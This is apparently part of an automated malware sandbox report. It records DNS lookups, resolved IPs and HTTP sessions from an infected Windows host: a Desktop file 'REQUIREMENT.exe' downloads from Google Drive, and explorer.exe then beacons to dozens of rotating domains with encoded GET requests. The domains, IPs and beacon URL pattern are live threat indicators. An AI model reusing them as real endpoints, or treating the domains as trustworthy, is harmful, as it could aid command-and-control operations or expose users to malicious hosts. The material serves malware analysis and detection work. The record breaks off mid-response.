Oct 13, 2021 15:48:37.134753942 CEST	192.168.11.20	1.1.1.1	0x10c3	Standard query (0)	www.bqgfk.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:43.227217913 CEST	192.168.11.20	1.1.1.1	0x8473	Standard query (0)	www.centralcontable.net	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:49.257591963 CEST	192.168.11.20	1.1.1.1	0x7acc	Standard query (0)	www.mobileiranian2.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:54.865354061 CEST	192.168.11.20	1.1.1.1	0x5003	Standard query (0)	www.soymilk-design.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.520138025 CEST	192.168.11.20	1.1.1.1	0x8699	Standard query (0)	www.domainair.biz	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:05.956368923 CEST	192.168.11.20	1.1.1.1	0xd29f	Standard query (0)	www.nazfoodstuff.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:11.596829891 CEST	192.168.11.20	1.1.1.1	0x13fd	Standard query (0)	www.cacaolixir.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:16.735208035 CEST	192.168.11.20	1.1.1.1	0x19b4	Standard query (0)	www.fishermandm.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:27.170883894 CEST	192.168.11.20	1.1.1.1	0x3bb	Standard query (0)	www.tpmionline.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:33.169308901 CEST	192.168.11.20	1.1.1.1	0x6d81	Standard query (0)	www.shopsharpgraphics.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:38.917963028 CEST	192.168.11.20	1.1.1.1	0x8c6e	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:39.389360905 CEST	192.168.11.20	9.9.9.9	0x8c6e	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:40.401524067 CEST	192.168.11.20	9.9.9.9	0x8c6e	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:51.055682898 CEST	192.168.11.20	1.1.1.1	0xc512	Standard query (0)	www.jkwhitleyphotography.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.663837910 CEST	192.168.11.20	1.1.1.1	0x32e	Standard query (0)	www.boliden-ab.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:02.038378954 CEST	192.168.11.20	1.1.1.1	0x523f	Standard query (0)	www.jachaljuega.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:07.208560944 CEST	192.168.11.20	1.1.1.1	0xd70	Standard query (0)	www.xn--4pvw92bcry.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:12.582761049 CEST	192.168.11.20	1.1.1.1	0x1f89	Standard query (0)	www.ceruleden.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.579931974 CEST	192.168.11.20	1.1.1.1	0x9571	Standard query (0)	www.marvellouslles.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:29.032129049 CEST	192.168.11.20	1.1.1.1	0xc8f8	Standard query (0)	www.originial-motors.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:55.104711056 CEST	192.168.11.20	1.1.1.1	0x2d65	Standard query (0)	www.high-clicks.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:20.223670959 CEST	192.168.11.20	1.1.1.1	0x925f	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:20.482564926 CEST	192.168.11.20	9.9.9.9	0x925f	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:21.488670111 CEST	192.168.11.20	9.9.9.9	0x925f	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:39.344506025 CEST	192.168.11.20	1.1.1.1	0x683d	Standard query (0)	www.alo360.net	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:40.359618902 CEST	192.168.11.20	9.9.9.9	0x683d	Standard query (0)	www.alo360.net	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:46.545898914 CEST	192.168.11.20	9.9.9.9	0x7034	Standard query (0)	www.ebbtidefloodtide.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:47.105791092 CEST	192.168.11.20	9.9.9.9	0xfb0	Standard query (0)	doc-0o-60-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:47.475670099 CEST	192.168.11.20	9.9.9.9	0x6499	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:51.607357025 CEST	192.168.11.20	9.9.9.9	0xab29	Standard query (0)	www.originial-motors.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:56.654273033 CEST	192.168.11.20	9.9.9.9	0xb93a	Standard query (0)	www.thousandoaks-buickgmc.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:18.492887974 CEST	192.168.11.20	9.9.9.9	0x75e7	Standard query (0)	www.thousandoaks-buickgmc.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:35.173947096 CEST	192.168.11.20	9.9.9.9	0x421b	Standard query (0)	clients.config.office.net	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:43.846261978 CEST	192.168.11.20	9.9.9.9	0xa404	Standard query (0)	www.nu12.online	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:59.186666012 CEST	192.168.11.20	9.9.9.9	0x67b6	Standard query (0)	www.cinargeridonusum.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:53:46.894329071 CEST	192.168.11.20	9.9.9.9	0x34a1	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:53:47.115298986 CEST	192.168.11.20	1.1.1.1	0x34a1	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:00.594572067 CEST	192.168.11.20	9.9.9.9	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:01.109817982 CEST	192.168.11.20	1.1.1.1	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:02.125168085 CEST	192.168.11.20	9.9.9.9	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:04.140288115 CEST	192.168.11.20	9.9.9.9	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:04.140337944 CEST	192.168.11.20	1.1.1.1	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:08.155180931 CEST	192.168.11.20	9.9.9.9	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:08.155185938 CEST	192.168.11.20	1.1.1.1	0x55e2	Standard query (0)	www.yakyu-eiga.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:13.514287949 CEST	192.168.11.20	9.9.9.9	0x8ef6	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:13.756365061 CEST	192.168.11.20	1.1.1.1	0x8ef6	Standard query (0)	www.sanchalanprokashon.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:24.824090958 CEST	192.168.11.20	9.9.9.9	0x6d87	Standard query (0)	www.6ohmf.info	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:29.853694916 CEST	192.168.11.20	9.9.9.9	0x20d	Standard query (0)	www.uprisehealthmonitoring.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:35.227685928 CEST	192.168.11.20	9.9.9.9	0x662c	Standard query (0)	www.estudio-me.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:40.461359024 CEST	192.168.11.20	9.9.9.9	0x6ef1	Standard query (0)	www.i8news-de.website	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:45.725404978 CEST	192.168.11.20	9.9.9.9	0x8e44	Standard query (0)	www.alexanderorlandis.com	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:46.240529060 CEST	192.168.11.20	1.1.1.1	0x8e44	Standard query (0)	www.alexanderorlandis.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 15:47:08.587738991 CEST	1.1.1.1	192.168.11.20	0xe847	No error (0)	drive.google.com		172.217.168.46	A (IP address)	IN (0x0001)
Oct 13, 2021 15:47:09.285367012 CEST	1.1.1.1	192.168.11.20	0xd600	No error (0)	doc-04-7g-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:47:09.285367012 CEST	1.1.1.1	192.168.11.20	0xd600	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:15.788871050 CEST	1.1.1.1	192.168.11.20	0x2583	No error (0)	www.hkautobox.com	hkautobox.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:48:15.788871050 CEST	1.1.1.1	192.168.11.20	0x2583	No error (0)	hkautobox.com		51.77.52.109	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:21.483603954 CEST	1.1.1.1	192.168.11.20	0xcca5	No error (0)	www.taichan.xyz	taichan.xyz		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:48:21.483603954 CEST	1.1.1.1	192.168.11.20	0xcca5	No error (0)	taichan.xyz		103.164.172.49	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:26.940375090 CEST	1.1.1.1	192.168.11.20	0x62bf	No error (0)	www.researchlearningspirit.xyz		172.67.139.41	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:26.940375090 CEST	1.1.1.1	192.168.11.20	0x62bf	No error (0)	www.researchlearningspirit.xyz		104.21.46.132	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:32.005676985 CEST	1.1.1.1	192.168.11.20	0x79d5	No error (0)	www.bestofnapa.guide	bestofnapa.guide		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:48:32.005676985 CEST	1.1.1.1	192.168.11.20	0x79d5	No error (0)	bestofnapa.guide		34.102.136.180	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:37.670172930 CEST	1.1.1.1	192.168.11.20	0x10c3	No error (0)	www.bqgfk.com		154.195.206.5	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:43.982966900 CEST	1.1.1.1	192.168.11.20	0x8473	No error (0)	www.centralcontable.net	centralcontable.net		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:48:43.982966900 CEST	1.1.1.1	192.168.11.20	0x8473	No error (0)	centralcontable.net		198.59.144.16	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:49.577518940 CEST	1.1.1.1	192.168.11.20	0x7acc	No error (0)	www.mobileiranian2.com		185.73.226.109	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:55.396420956 CEST	1.1.1.1	192.168.11.20	0x5003	No error (0)	www.soymilk-design.com		151.101.192.119	A (IP address)	IN (0x0001)
Oct 13, 2021 15:48:55.396420956 CEST	1.1.1.1	192.168.11.20	0x5003	No error (0)	www.soymilk-design.com		151.101.0.119	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	www.domainair.biz	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:00.628799915 CEST	1.1.1.1	192.168.11.20	0x8699	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:06.245028019 CEST	1.1.1.1	192.168.11.20	0xd29f	No error (0)	www.nazfoodstuff.com	zhs.zohosites.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:06.245028019 CEST	1.1.1.1	192.168.11.20	0xd29f	No error (0)	zhs.zohosites.com		204.141.43.204	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:11.612540960 CEST	1.1.1.1	192.168.11.20	0x13fd	No error (0)	www.cacaolixir.com	cacaolixir.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:11.612540960 CEST	1.1.1.1	192.168.11.20	0x13fd	No error (0)	cacaolixir.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:16.920985937 CEST	1.1.1.1	192.168.11.20	0x19b4	No error (0)	www.fishermandm.com		66.96.130.148	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:27.864936113 CEST	1.1.1.1	192.168.11.20	0x3bb	No error (0)	www.tpmionline.com	tpmionline.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:27.864936113 CEST	1.1.1.1	192.168.11.20	0x3bb	No error (0)	tpmionline.com		216.189.108.75	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:27.864936113 CEST	1.1.1.1	192.168.11.20	0x3bb	No error (0)	tpmionline.com		216.189.108.83	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:33.560539007 CEST	1.1.1.1	192.168.11.20	0x6d81	No error (0)	www.shopsharpgraphics.com		199.34.228.191	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:39.389076948 CEST	1.1.1.1	192.168.11.20	0x8c6e	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:40.816879988 CEST	9.9.9.9	192.168.11.20	0x8c6e	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:40.985773087 CEST	9.9.9.9	192.168.11.20	0x8c6e	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:51.468550920 CEST	1.1.1.1	192.168.11.20	0xc512	No error (0)	www.jkwhitleyphotography.com	domains.pixpa.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:51.468550920 CEST	1.1.1.1	192.168.11.20	0xc512	No error (0)	domains.pixpa.com	a402f69f12f4a8640.awsglobalaccelerator.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:51.468550920 CEST	1.1.1.1	192.168.11.20	0xc512	No error (0)	a402f69f12f4a8640.awsglobalaccelerator.com		15.197.150.5	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:51.468550920 CEST	1.1.1.1	192.168.11.20	0xc512	No error (0)	a402f69f12f4a8640.awsglobalaccelerator.com		3.33.157.149	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	www.boliden-ab.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Oct 13, 2021 15:49:56.697240114 CEST	1.1.1.1	192.168.11.20	0x32e	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:02.073247910 CEST	1.1.1.1	192.168.11.20	0x523f	No error (0)	www.jachaljuega.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:50:02.073247910 CEST	1.1.1.1	192.168.11.20	0x523f	No error (0)	ghs.googlehosted.com		142.250.186.179	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:07.406692982 CEST	1.1.1.1	192.168.11.20	0xd70	No error (0)	www.xn--4pvw92bcry.com		75.2.115.196	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:12.936949015 CEST	1.1.1.1	192.168.11.20	0x1f89	No error (0)	www.ceruleden.com		47.88.32.85	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	www.marvellouslles.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:23.682571888 CEST	1.1.1.1	192.168.11.20	0x9571	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:29.085437059 CEST	1.1.1.1	192.168.11.20	0xc8f8	Name error (3)	www.originial-motors.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:50:55.151947021 CEST	1.1.1.1	192.168.11.20	0x2d65	No error (0)	www.high-clicks.com		192.64.116.180	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:20.482215881 CEST	1.1.1.1	192.168.11.20	0x925f	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:22.106215000 CEST	9.9.9.9	192.168.11.20	0x925f	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:22.214874983 CEST	9.9.9.9	192.168.11.20	0x925f	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:40.712682009 CEST	9.9.9.9	192.168.11.20	0x683d	No error (0)	www.alo360.net		156.239.224.4	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:40.936865091 CEST	1.1.1.1	192.168.11.20	0x683d	No error (0)	www.alo360.net		156.239.224.4	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:46.590653896 CEST	9.9.9.9	192.168.11.20	0x7034	Name error (3)	www.ebbtidefloodtide.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:47.123405933 CEST	9.9.9.9	192.168.11.20	0xfb0	No error (0)	doc-0o-60-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:51:47.123405933 CEST	9.9.9.9	192.168.11.20	0xfb0	No error (0)	googlehosted.l.googleusercontent.com		172.217.168.33	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:47.479154110 CEST	9.9.9.9	192.168.11.20	0x6499	No error (0)	docs.google.com		172.217.168.78	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:51.636647940 CEST	9.9.9.9	192.168.11.20	0xab29	Name error (3)	www.originial-motors.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:51:56.689119101 CEST	9.9.9.9	192.168.11.20	0xb93a	No error (0)	www.thousandoaks-buickgmc.com		199.101.245.90	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:18.521131992 CEST	9.9.9.9	192.168.11.20	0x75e7	No error (0)	www.thousandoaks-buickgmc.com		199.101.245.90	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:34.663312912 CEST	9.9.9.9	192.168.11.20	0xd4be	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:52:35.177371025 CEST	9.9.9.9	192.168.11.20	0x421b	No error (0)	clients.config.office.net	geo.clients.config.office.akadns.net		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:52:43.879914045 CEST	9.9.9.9	192.168.11.20	0xa404	No error (0)	www.nu12.online		91.195.240.94	A (IP address)	IN (0x0001)
Oct 13, 2021 15:52:59.362169027 CEST	9.9.9.9	192.168.11.20	0x67b6	No error (0)	www.cinargeridonusum.com		154.215.231.81	A (IP address)	IN (0x0001)
Oct 13, 2021 15:53:47.114963055 CEST	9.9.9.9	192.168.11.20	0x34a1	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:53:47.967560053 CEST	1.1.1.1	192.168.11.20	0x34a1	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:08.497015953 CEST	1.1.1.1	192.168.11.20	0x55e2	Server failure (2)	www.yakyu-eiga.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:08.497062922 CEST	1.1.1.1	192.168.11.20	0x55e2	Server failure (2)	www.yakyu-eiga.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:08.497095108 CEST	1.1.1.1	192.168.11.20	0x55e2	Server failure (2)	www.yakyu-eiga.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:11.217573881 CEST	9.9.9.9	192.168.11.20	0x55e2	Server failure (2)	www.yakyu-eiga.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:13.755866051 CEST	9.9.9.9	192.168.11.20	0x8ef6	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:14.460324049 CEST	1.1.1.1	192.168.11.20	0x8ef6	Server failure (2)	www.sanchalanprokashon.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:15.522609949 CEST	9.9.9.9	192.168.11.20	0x55e2	Server failure (2)	www.yakyu-eiga.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:24.847409964 CEST	9.9.9.9	192.168.11.20	0x6d87	Name error (3)	www.6ohmf.info	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:29.893034935 CEST	9.9.9.9	192.168.11.20	0x20d	No error (0)	www.uprisehealthmonitoring.com		137.117.17.70	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:35.270330906 CEST	9.9.9.9	192.168.11.20	0x662c	No error (0)	www.estudio-me.com	estudio-me.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:54:35.270330906 CEST	9.9.9.9	192.168.11.20	0x662c	No error (0)	estudio-me.com		192.0.78.25	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:35.270330906 CEST	9.9.9.9	192.168.11.20	0x662c	No error (0)	estudio-me.com		192.0.78.24	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:40.697252989 CEST	9.9.9.9	192.168.11.20	0x6ef1	No error (0)	www.i8news-de.website		3.121.211.190	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:46.242796898 CEST	9.9.9.9	192.168.11.20	0x8e44	No error (0)	www.alexanderorlandis.com	alexanderorlandis.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:54:46.242796898 CEST	9.9.9.9	192.168.11.20	0x8e44	No error (0)	alexanderorlandis.com		156.67.72.176	A (IP address)	IN (0x0001)
Oct 13, 2021 15:54:46.424149036 CEST	1.1.1.1	192.168.11.20	0x8e44	No error (0)	www.alexanderorlandis.com	alexanderorlandis.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 15:54:46.424149036 CEST	1.1.1.1	192.168.11.20	0x8e44	No error (0)	alexanderorlandis.com		156.67.72.176	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-04-7g-docs.googleusercontent.com

doc-0o-60-docs.googleusercontent.com

docs.google.com

www.hkautobox.com

www.taichan.xyz

www.researchlearningspirit.xyz

www.bestofnapa.guide

www.bqgfk.com

www.centralcontable.net

www.mobileiranian2.com

www.soymilk-design.com

www.domainair.biz

www.nazfoodstuff.com

www.cacaolixir.com

www.fishermandm.com

www.tpmionline.com

www.shopsharpgraphics.com

www.jkwhitleyphotography.com

www.boliden-ab.com

www.jachaljuega.com

www.xn--4pvw92bcry.com

www.ceruleden.com

www.marvellouslles.com

www.high-clicks.com

www.alo360.net

www.nu12.online

www.cinargeridonusum.com

www.uprisehealthmonitoring.com

www.estudio-me.com

www.i8news-de.website

www.alexanderorlandis.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49790	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49791	142.250.185.161	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49793	51.77.52.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:48:15.815474987 CEST	6503	OUT	GET /cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC HTTP/1.1 Host: www.hkautobox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:48:15.841248035 CEST	6504	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 708 Date: Wed, 13 Oct 2021 13:48:15 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 